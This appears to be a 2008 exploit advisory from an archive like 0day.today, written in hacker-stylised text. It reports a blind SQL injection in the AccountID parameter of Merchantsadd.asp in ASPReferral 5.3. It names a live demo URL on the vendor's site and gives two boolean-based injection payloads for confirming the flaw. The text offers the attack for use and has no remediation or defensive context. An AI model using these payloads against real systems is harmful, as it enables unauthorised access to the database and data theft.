id: 4296
date: 11/29/2008
title: ASPReferral 5.3 (AccountID) Blind SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

=============================================================
ASPReferral 5.3 (AccountID) Blind SQL Injection Vulnerability 
=============================================================


[~]Tybe:(Merchantsadd.asp AccountID) Blind SQL Injection Vulnerability
   
 [~]Vendor:www.activewebsoftwares.com
   
 [~]Software: ASPReferral
   
 [~] Date: 28.11.2008
   
 [~] Home: www.ahacker.biz
   
 [~] contact: N/A

[~] -----------------------------------------------------------
   
 [~]3xpL0!7 4 d3m0:
   
  http://www.activewebsoftwares.com/demoaspreferral/Merchantsadd.asp?AccountID={bL!ND}
   
 [~] 8L!/\/D:
   
  7Ru3 : Merchantsadd.asp?AccountID= 1 and 1=1
  f4L53: Merchantsadd.asp?AccountID= 1 and 1=2
   
   
 
[~]--------------------------------------------------------------------------------



#  0day.today [2023-03-26]  #